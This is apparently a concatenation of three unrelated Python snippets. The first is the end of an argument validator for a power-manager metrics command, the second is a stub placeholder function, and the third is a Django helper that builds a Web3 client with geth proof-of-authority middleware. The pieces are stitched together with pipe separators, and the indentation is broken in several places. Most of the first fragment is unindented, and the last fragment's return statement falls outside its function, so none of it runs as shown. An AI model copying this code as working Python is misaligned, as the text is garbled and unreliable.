"\n !!! ERROR :: Wrong Metric Value Entered !!! \n Please use --help/-h for proper metric value & try again")
exit()
else:
if int(i) not in range(1, 19):
print(
"\n !!! ERROR :: Wrong Metric Value Entered !!! \n Please use --help/-h for proper metric value & try again")
exit()
else:
mt_list.append(int(i))
else:
if not metricType.isdigit():
print(
"\n !!! ERROR :: Wrong Metric Value Entered !!! \n Please use --help/-h for proper metric value & try again")
exit()
else:
if int(metricType) not in range(1, 19):
print(
"\n !!! ERROR :: Wrong Metric Value Entered !!! \n Please use --help/-h for proper metric value & try again")
exit()
else:
mt_list.append(int(metricType))
    if args.duration and int(args.duration) not in range(0, 10):
        print(
            "\n !!! ERROR :: Wrong Duration Value Entered !!! \n Please use --help/-h for proper duration value & try again")
        sys.exit(1)
    if args.sort and int(args.sort) not in range(0, 2):
        print(
            "\n !!! ERROR :: Wrong Sort Value Entered !!! \n Please use --help/-h for proper sort value & try again")
        sys.exit(1)
get_power_manager_group_metrics(args.ip, args.username, args.password, args.groupID, mt_list, args.duration,
args.sort) |
def pythonstuff_main():
    return 'This is just to initialize the project. I\'ll kill it later'
|
from django.conf import settings
from web3 import Web3, HTTPProvider
from web3.middleware import geth_poa_middleware
def get_w3():
    """Return a Web3 instance connected to the node configured via settings.NODE_URL."""
    w3 = Web3(HTTPProvider(settings.NODE_URL))
    # Inject the geth proof-of-authority middleware so blocks from PoA chains,
    # whose extraData field exceeds the standard length, are accepted
    w3.middleware_stack.inject(geth_poa_middleware, layer=0)
return w3
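# Example usage (a minimal sketch; assumes settings.NODE_URL points at a reachable
# geth-style PoA node and web3.py v4, whose middleware_stack API is used above):
#   w3 = get_w3()
#   latest_block = w3.eth.blockNumber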
|